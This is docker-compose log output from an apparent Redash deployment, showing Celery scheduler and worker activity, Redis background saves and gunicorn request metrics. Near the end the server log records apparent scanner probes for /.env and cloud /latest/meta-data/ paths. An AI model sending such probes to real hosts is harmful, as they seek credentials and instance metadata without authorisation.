scheduler_1         | [2021-12-15 03:31:26,017][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:31:56,037][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:32:24,420][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:32:26,037][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:32:56,058][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:33:19,779][PID:14][INFO][Beat] Scheduler: Sending due task cleanup_query_results (redash.tasks.cleanup_query_results)
scheduler_1         | [2021-12-15 03:33:24,420][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:33:26,058][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:33:56,058][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:34:24,420][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:34:26,058][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:34:56,058][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:35:24,439][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:35:26,058][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:35:56,078][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:36:24,439][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:36:26,078][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:36:56,084][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:37:24,444][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:37:26,084][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:37:56,084][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:38:19,779][PID:14][INFO][Beat] Scheduler: Sending due task cleanup_query_results (redash.tasks.cleanup_query_results)
scheduler_1         | [2021-12-15 03:38:24,444][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:38:26,084][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:38:56,084][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:39:24,462][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:39:26,084][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:39:56,088][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:40:24,469][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:40:26,088][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:40:56,088][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:41:24,487][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:41:26,088][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:41:56,109][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:42:24,505][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:42:26,109][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:42:56,114][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:43:19,779][PID:14][INFO][Beat] Scheduler: Sending due task cleanup_query_results (redash.tasks.cleanup_query_results)
scheduler_1         | [2021-12-15 03:43:24,505][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:43:26,114][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:43:40,592][PID:14][INFO][Beat] Scheduler: Sending due task refresh_schemas (redash.tasks.refresh_schemas)
scheduler_1         | [2021-12-15 03:43:56,114][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:44:24,524][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:44:26,115][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:44:56,132][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:45:24,532][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:45:26,132][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:45:56,148][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:46:24,548][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:46:26,148][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:46:56,149][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:47:24,548][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:47:26,149][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:47:56,169][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:48:19,779][PID:14][INFO][Beat] Scheduler: Sending due task cleanup_query_results (redash.tasks.cleanup_query_results)
scheduler_1         | [2021-12-15 03:48:24,548][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:48:26,169][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:48:56,169][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:49:24,567][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:49:26,169][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:49:56,188][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:50:24,586][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:50:26,188][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:50:31,968][PID:14][INFO][Beat] Scheduler: Sending due task send_aggregated_errors (redash.tasks.send_aggregated_errors)
scheduler_1         | [2021-12-15 03:50:31,970][PID:14][INFO][Beat] Scheduler: Sending due task empty_schedules (redash.tasks.empty_schedules)
scheduler_1         | [2021-12-15 03:50:56,201][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:51:24,604][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:51:26,201][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:51:56,220][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:52:24,622][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:52:26,220][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:52:56,220][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:53:19,792][PID:14][INFO][Beat] Scheduler: Sending due task cleanup_query_results (redash.tasks.cleanup_query_results)
scheduler_1         | [2021-12-15 03:53:24,623][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:53:26,220][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:53:56,220][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
scheduler_1         | [2021-12-15 03:54:24,641][PID:14][INFO][Beat] Scheduler: Sending due task sync_user_details (redash.tasks.sync_user_details)
scheduler_1         | [2021-12-15 03:54:26,220][PID:14][INFO][Beat] Scheduler: Sending due task refresh_queries (redash.tasks.refresh_queries)
adhoc_worker_1      |                 .> queries          exchange=queries(direct) key=queries
adhoc_worker_1      |                 
adhoc_worker_1      | 
adhoc_worker_1      | [tasks]
adhoc_worker_1      |   . redash.tasks.check_alerts_for_query
adhoc_worker_1      |   . redash.tasks.cleanup_query_results
adhoc_worker_1      |   . redash.tasks.empty_schedules
adhoc_worker_1      |   . redash.tasks.execute_query
adhoc_worker_1      |   . redash.tasks.record_event
adhoc_worker_1      |   . redash.tasks.refresh_queries
adhoc_worker_1      |   . redash.tasks.refresh_schema
adhoc_worker_1      |   . redash.tasks.refresh_schemas
adhoc_worker_1      |   . redash.tasks.send_aggregated_errors
adhoc_worker_1      |   . redash.tasks.send_mail
adhoc_worker_1      |   . redash.tasks.subscribe
adhoc_worker_1      |   . redash.tasks.sync_user_details
adhoc_worker_1      |   . redash.tasks.version_check
adhoc_worker_1      | 
adhoc_worker_1      | [2021-12-14 09:50:26,255][PID:1][INFO][MainProcess] Connected to redis://redis:6379/0
adhoc_worker_1      | [2021-12-14 09:50:26,354][PID:1][INFO][MainProcess] mingle: searching for neighbors
adhoc_worker_1      | [2021-12-14 09:50:27,481][PID:1][INFO][MainProcess] mingle: all alone
adhoc_worker_1      | [2021-12-14 09:50:27,547][PID:1][INFO][MainProcess] celery@4a09e1d19ec1 ready.
adhoc_worker_1      | 
adhoc_worker_1      | worker: Warm shutdown (MainProcess)
adhoc_worker_1      | Starting 2 workers for queues: queries...
adhoc_worker_1      |  
adhoc_worker_1      |  -------------- celery@4a09e1d19ec1 v4.3.0 (rhubarb)
adhoc_worker_1      | ---- **** ----- 
adhoc_worker_1      | --- * ***  * -- Linux-5.4.0-1059-aws-x86_64-with-debian-10.0 2021-12-14 13:23:53
adhoc_worker_1      | -- * - **** --- 
adhoc_worker_1      | - ** ---------- [config]
adhoc_worker_1      | - ** ---------- .> app:         redash:0x7f6cd25baa10
adhoc_worker_1      | - ** ---------- .> transport:   redis://redis:6379/0
adhoc_worker_1      | - ** ---------- .> results:     redis://redis:6379/0
adhoc_worker_1      | - *** --- * --- .> concurrency: 2 (prefork)
adhoc_worker_1      | -- ******* ---- .> task events: OFF (enable -E to monitor tasks in this worker)
adhoc_worker_1      | --- ***** ----- 
adhoc_worker_1      |  -------------- [queues]
adhoc_worker_1      |                 .> queries          exchange=queries(direct) key=queries
adhoc_worker_1      |                 
adhoc_worker_1      | 
adhoc_worker_1      | [tasks]
adhoc_worker_1      |   . redash.tasks.check_alerts_for_query
adhoc_worker_1      |   . redash.tasks.cleanup_query_results
adhoc_worker_1      |   . redash.tasks.empty_schedules
adhoc_worker_1      |   . redash.tasks.execute_query
adhoc_worker_1      |   . redash.tasks.record_event
adhoc_worker_1      |   . redash.tasks.refresh_queries
adhoc_worker_1      |   . redash.tasks.refresh_schema
adhoc_worker_1      |   . redash.tasks.refresh_schemas
adhoc_worker_1      |   . redash.tasks.send_aggregated_errors
adhoc_worker_1      |   . redash.tasks.send_mail
adhoc_worker_1      |   . redash.tasks.subscribe
adhoc_worker_1      |   . redash.tasks.sync_user_details
adhoc_worker_1      |   . redash.tasks.version_check
adhoc_worker_1      | 
adhoc_worker_1      | [2021-12-14 13:23:54,964][PID:1][INFO][MainProcess] Connected to redis://redis:6379/0
adhoc_worker_1      | [2021-12-14 13:23:55,079][PID:1][INFO][MainProcess] mingle: searching for neighbors
adhoc_worker_1      | [2021-12-14 13:23:56,228][PID:1][INFO][MainProcess] mingle: sync with 1 nodes
adhoc_worker_1      | [2021-12-14 13:23:56,231][PID:1][INFO][MainProcess] mingle: sync complete
adhoc_worker_1      | [2021-12-14 13:23:56,282][PID:1][INFO][MainProcess] celery@4a09e1d19ec1 ready.
adhoc_worker_1      | 
adhoc_worker_1      | worker: Warm shutdown (MainProcess)
adhoc_worker_1      | Starting 2 workers for queues: queries...
adhoc_worker_1      |  
adhoc_worker_1      |  -------------- celery@4a09e1d19ec1 v4.3.0 (rhubarb)
adhoc_worker_1      | ---- **** ----- 
adhoc_worker_1      | --- * ***  * -- Linux-5.4.0-1059-aws-x86_64-with-debian-10.0 2021-12-14 14:38:11
adhoc_worker_1      | -- * - **** --- 
adhoc_worker_1      | - ** ---------- [config]
adhoc_worker_1      | - ** ---------- .> app:         redash:0x7f8c48a47a10
adhoc_worker_1      | - ** ---------- .> transport:   redis://redis:6379/0
adhoc_worker_1      | - ** ---------- .> results:     redis://redis:6379/0
adhoc_worker_1      | - *** --- * --- .> concurrency: 2 (prefork)
adhoc_worker_1      | -- ******* ---- .> task events: OFF (enable -E to monitor tasks in this worker)
adhoc_worker_1      | --- ***** ----- 
adhoc_worker_1      |  -------------- [queues]
adhoc_worker_1      |                 .> queries          exchange=queries(direct) key=queries
adhoc_worker_1      |                 
adhoc_worker_1      | 
adhoc_worker_1      | [tasks]
adhoc_worker_1      |   . redash.tasks.check_alerts_for_query
adhoc_worker_1      |   . redash.tasks.cleanup_query_results
adhoc_worker_1      |   . redash.tasks.empty_schedules
adhoc_worker_1      |   . redash.tasks.execute_query
adhoc_worker_1      |   . redash.tasks.record_event
adhoc_worker_1      |   . redash.tasks.refresh_queries
adhoc_worker_1      |   . redash.tasks.refresh_schema
adhoc_worker_1      |   . redash.tasks.refresh_schemas
adhoc_worker_1      |   . redash.tasks.send_aggregated_errors
adhoc_worker_1      |   . redash.tasks.send_mail
adhoc_worker_1      |   . redash.tasks.subscribe
adhoc_worker_1      |   . redash.tasks.sync_user_details
adhoc_worker_1      |   . redash.tasks.version_check
adhoc_worker_1      | 
adhoc_worker_1      | [2021-12-14 14:38:12,986][PID:1][INFO][MainProcess] Connected to redis://redis:6379/0
adhoc_worker_1      | [2021-12-14 14:38:13,062][PID:1][INFO][MainProcess] mingle: searching for neighbors
adhoc_worker_1      | [2021-12-14 14:38:14,273][PID:1][INFO][MainProcess] mingle: sync with 1 nodes
adhoc_worker_1      | [2021-12-14 14:38:14,274][PID:1][INFO][MainProcess] mingle: sync complete
adhoc_worker_1      | [2021-12-14 14:38:14,384][PID:1][INFO][MainProcess] celery@4a09e1d19ec1 ready.
redis_1             | 1:M 15 Dec 2021 00:48:05.680 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 00:48:05.681 * Background saving started by pid 76
redis_1             | 76:C 15 Dec 2021 00:48:05.697 * DB saved on disk
redis_1             | 76:C 15 Dec 2021 00:48:05.697 * RDB: 0 MB of memory used by copy-on-write
redis_1             | 1:M 15 Dec 2021 00:48:05.781 * Background saving terminated with success
redis_1             | 1:M 15 Dec 2021 00:58:04.896 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 00:58:04.897 * Background saving started by pid 77
redis_1             | 77:C 15 Dec 2021 00:58:04.913 * DB saved on disk
redis_1             | 77:C 15 Dec 2021 00:58:04.914 * RDB: 0 MB of memory used by copy-on-write
redis_1             | 1:M 15 Dec 2021 00:58:04.998 * Background saving terminated with success
redis_1             | 1:M 15 Dec 2021 01:08:03.919 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 01:08:03.920 * Background saving started by pid 78
redis_1             | 78:C 15 Dec 2021 01:08:03.936 * DB saved on disk
redis_1             | 78:C 15 Dec 2021 01:08:03.936 * RDB: 0 MB of memory used by copy-on-write
redis_1             | 1:M 15 Dec 2021 01:08:04.020 * Background saving terminated with success
redis_1             | 1:M 15 Dec 2021 01:17:24.723 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 01:17:24.723 * Background saving started by pid 79
redis_1             | 79:C 15 Dec 2021 01:17:24.740 * DB saved on disk
redis_1             | 79:C 15 Dec 2021 01:17:24.740 * RDB: 0 MB of memory used by copy-on-write
redis_1             | 1:M 15 Dec 2021 01:17:24.824 * Background saving terminated with success
redis_1             | 1:M 15 Dec 2021 01:26:25.806 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 01:26:25.806 * Background saving started by pid 80
redis_1             | 80:C 15 Dec 2021 01:26:25.823 * DB saved on disk
redis_1             | 80:C 15 Dec 2021 01:26:25.823 * RDB: 0 MB of memory used by copy-on-write
redis_1             | 1:M 15 Dec 2021 01:26:25.907 * Background saving terminated with success
redis_1             | 1:M 15 Dec 2021 01:36:24.977 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 01:36:24.977 * Background saving started by pid 81
redis_1             | 81:C 15 Dec 2021 01:36:24.993 * DB saved on disk
redis_1             | 81:C 15 Dec 2021 01:36:24.994 * RDB: 0 MB of memory used by copy-on-write
redis_1             | 1:M 15 Dec 2021 01:36:25.077 * Background saving terminated with success
redis_1             | 1:M 15 Dec 2021 01:46:24.029 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 01:46:24.029 * Background saving started by pid 82
redis_1             | 82:C 15 Dec 2021 01:46:24.047 * DB saved on disk
redis_1             | 82:C 15 Dec 2021 01:46:24.048 * RDB: 0 MB of memory used by copy-on-write
redis_1             | 1:M 15 Dec 2021 01:46:24.130 * Background saving terminated with success
redis_1             | 1:M 15 Dec 2021 01:55:25.148 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 01:55:25.148 * Background saving started by pid 83
redis_1             | 83:C 15 Dec 2021 01:55:25.165 * DB saved on disk
redis_1             | 83:C 15 Dec 2021 01:55:25.165 * RDB: 0 MB of memory used by copy-on-write
redis_1             | 1:M 15 Dec 2021 01:55:25.249 * Background saving terminated with success
redis_1             | 1:M 15 Dec 2021 02:04:45.955 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 02:04:45.955 * Background saving started by pid 84
redis_1             | 84:C 15 Dec 2021 02:04:45.972 * DB saved on disk
redis_1             | 84:C 15 Dec 2021 02:04:45.972 * RDB: 0 MB of memory used by copy-on-write
redis_1             | 1:M 15 Dec 2021 02:04:46.055 * Background saving terminated with success
redis_1             | 1:M 15 Dec 2021 02:14:45.141 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 02:14:45.141 * Background saving started by pid 85
redis_1             | 85:C 15 Dec 2021 02:14:45.158 * DB saved on disk
redis_1             | 85:C 15 Dec 2021 02:14:45.159 * RDB: 0 MB of memory used by copy-on-write
redis_1             | 1:M 15 Dec 2021 02:14:45.242 * Background saving terminated with success
redis_1             | 1:M 15 Dec 2021 02:24:44.224 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 02:24:44.224 * Background saving started by pid 86
redis_1             | 86:C 15 Dec 2021 02:24:44.241 * DB saved on disk
redis_1             | 86:C 15 Dec 2021 02:24:44.242 * RDB: 0 MB of memory used by copy-on-write
redis_1             | 1:M 15 Dec 2021 02:24:44.324 * Background saving terminated with success
redis_1             | 1:M 15 Dec 2021 02:34:25.452 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 02:34:25.453 * Background saving started by pid 87
redis_1             | 87:C 15 Dec 2021 02:34:25.471 * DB saved on disk
redis_1             | 87:C 15 Dec 2021 02:34:25.471 * RDB: 0 MB of memory used by copy-on-write
redis_1             | 1:M 15 Dec 2021 02:34:25.553 * Background saving terminated with success
redis_1             | 1:M 15 Dec 2021 02:43:24.089 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 02:43:24.089 * Background saving started by pid 88
redis_1             | 88:C 15 Dec 2021 02:43:24.107 * DB saved on disk
redis_1             | 88:C 15 Dec 2021 02:43:24.107 * RDB: 0 MB of memory used by copy-on-write
redis_1             | 1:M 15 Dec 2021 02:43:24.190 * Background saving terminated with success
redis_1             | 1:M 15 Dec 2021 02:53:05.327 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 02:53:05.327 * Background saving started by pid 89
redis_1             | 89:C 15 Dec 2021 02:53:05.344 * DB saved on disk
redis_1             | 89:C 15 Dec 2021 02:53:05.344 * RDB: 0 MB of memory used by copy-on-write
redis_1             | 1:M 15 Dec 2021 02:53:05.427 * Background saving terminated with success
redis_1             | 1:M 15 Dec 2021 03:03:04.322 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 03:03:04.322 * Background saving started by pid 90
redis_1             | 90:C 15 Dec 2021 03:03:04.339 * DB saved on disk
redis_1             | 90:C 15 Dec 2021 03:03:04.339 * RDB: 0 MB of memory used by copy-on-write
redis_1             | 1:M 15 Dec 2021 03:03:04.422 * Background saving terminated with success
redis_1             | 1:M 15 Dec 2021 03:12:55.916 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 03:12:55.917 * Background saving started by pid 91
redis_1             | 91:C 15 Dec 2021 03:12:55.935 * DB saved on disk
redis_1             | 91:C 15 Dec 2021 03:12:55.935 * RDB: 0 MB of memory used by copy-on-write
redis_1             | 1:M 15 Dec 2021 03:12:56.017 * Background saving terminated with success
redis_1             | 1:M 15 Dec 2021 03:21:26.251 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 03:21:26.252 * Background saving started by pid 92
redis_1             | 92:C 15 Dec 2021 03:21:26.269 * DB saved on disk
redis_1             | 92:C 15 Dec 2021 03:21:26.269 * RDB: 0 MB of memory used by copy-on-write
redis_1             | 1:M 15 Dec 2021 03:21:26.352 * Background saving terminated with success
redis_1             | 1:M 15 Dec 2021 03:31:26.048 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 03:31:26.048 * Background saving started by pid 93
redis_1             | 93:C 15 Dec 2021 03:31:26.066 * DB saved on disk
redis_1             | 93:C 15 Dec 2021 03:31:26.066 * RDB: 0 MB of memory used by copy-on-write
redis_1             | 1:M 15 Dec 2021 03:31:26.149 * Background saving terminated with success
redis_1             | 1:M 15 Dec 2021 03:41:25.416 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 03:41:25.417 * Background saving started by pid 94
redis_1             | 94:C 15 Dec 2021 03:41:25.437 * DB saved on disk
redis_1             | 94:C 15 Dec 2021 03:41:25.437 * RDB: 0 MB of memory used by copy-on-write
redis_1             | 1:M 15 Dec 2021 03:41:25.517 * Background saving terminated with success
redis_1             | 1:M 15 Dec 2021 03:51:24.434 * 100 changes in 300 seconds. Saving...
redis_1             | 1:M 15 Dec 2021 03:51:24.435 * Background saving started by pid 95
redis_1             | 95:C 15 Dec 2021 03:51:24.455 * DB saved on disk
redis_1             | 95:C 15 Dec 2021 03:51:24.455 * RDB: 0 MB of memory used by copy-on-write
server_1            | [2021-12-14 13:23:43 +0000] [11] [INFO] Booting worker with pid: 11
server_1            | [2021-12-14 13:23:43 +0000] [13] [INFO] Booting worker with pid: 13
server_1            | [2021-12-14 13:35:06,872][PID:13][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=299 duration=0.65 query_count=0 query_duration=0.00
server_1            | [2021-12-14 13:55:51,023][PID:10][INFO][metrics] method=POST path=/login endpoint=redash_login status=200 content_type=text/html; charset=utf-8 content_length=1982 duration=33.65 query_count=3 query_duration=16.25
server_1            | [2021-12-14 13:55:52,910][PID:13][INFO][metrics] method=POST path=/login endpoint=redash_login status=200 content_type=text/html; charset=utf-8 content_length=1982 duration=23.61 query_count=3 query_duration=8.95
server_1            | [2021-12-14 14:35:48 +0000] [1] [INFO] Handling signal: term
server_1            | [2021-12-14 14:35:48 +0000] [10] [INFO] Worker exiting (pid: 10)
server_1            | [2021-12-14 14:35:48 +0000] [11] [INFO] Worker exiting (pid: 11)
server_1            | [2021-12-14 14:35:48 +0000] [12] [INFO] Worker exiting (pid: 12)
server_1            | [2021-12-14 14:35:48 +0000] [13] [INFO] Worker exiting (pid: 13)
server_1            | [2021-12-14 14:35:49 +0000] [1] [INFO] Shutting down: Master
server_1            | [2021-12-14 14:38:02 +0000] [1] [INFO] Starting gunicorn 19.7.1
server_1            | [2021-12-14 14:38:02 +0000] [1] [INFO] Listening at: http://0.0.0.0:5000 (1)
server_1            | [2021-12-14 14:38:02 +0000] [1] [INFO] Using worker: sync
server_1            | [2021-12-14 14:38:02 +0000] [10] [INFO] Booting worker with pid: 10
server_1            | [2021-12-14 14:38:02 +0000] [11] [INFO] Booting worker with pid: 11
server_1            | [2021-12-14 14:38:02 +0000] [12] [INFO] Booting worker with pid: 12
server_1            | [2021-12-14 14:38:02 +0000] [15] [INFO] Booting worker with pid: 15
server_1            | [2021-12-14 14:41:45,033][PID:12][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=289 duration=0.69 query_count=0 query_duration=0.00
server_1            | [2021-12-14 14:42:03,954][PID:10][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=289 duration=0.63 query_count=0 query_duration=0.00
server_1            | [2021-12-14 15:46:40,170][PID:15][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=299 duration=0.66 query_count=0 query_duration=0.00
server_1            | [2021-12-14 16:41:43,988][PID:15][INFO][metrics] method=GET path=/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=297 duration=0.61 query_count=0 query_duration=0.00
server_1            | [2021-12-14 16:41:48,897][PID:15][INFO][metrics] method=POST path=/ endpoint=unknown status=405 content_type=text/html content_length=178 duration=2.78 query_count=0 query_duration=0.00
server_1            | [2021-12-14 16:50:33,829][PID:10][INFO][metrics] method=GET path=/latest/meta-data/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=335 duration=0.58 query_count=0 query_duration=0.00
server_1            | [2021-12-14 16:50:35,107][PID:11][INFO][metrics] method=GET path=/login endpoint=redash_login status=200 content_type=text/html; charset=utf-8 content_length=1827 duration=238.66 query_count=1 query_duration=6.28
server_1            | [2021-12-14 17:12:44,117][PID:11][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=299 duration=0.60 query_count=0 query_duration=0.00
server_1            | [2021-12-14 17:23:26,858][PID:12][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=289 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-14 17:23:27,262][PID:12][INFO][metrics] method=GET path=/login endpoint=redash_login status=200 content_type=text/html; charset=utf-8 content_length=1827 duration=228.88 query_count=1 query_duration=3.28
server_1            | [2021-12-14 17:35:17,714][PID:15][INFO][metrics] method=GET path=/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=297 duration=0.58 query_count=0 query_duration=0.00
server_1            | [2021-12-14 17:35:18,051][PID:15][INFO][metrics] method=POST path=/ endpoint=unknown status=405 content_type=text/html content_length=178 duration=0.39 query_count=0 query_duration=0.00
server_1            | [2021-12-14 18:12:40,406][PID:10][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=289 duration=0.54 query_count=0 query_duration=0.00
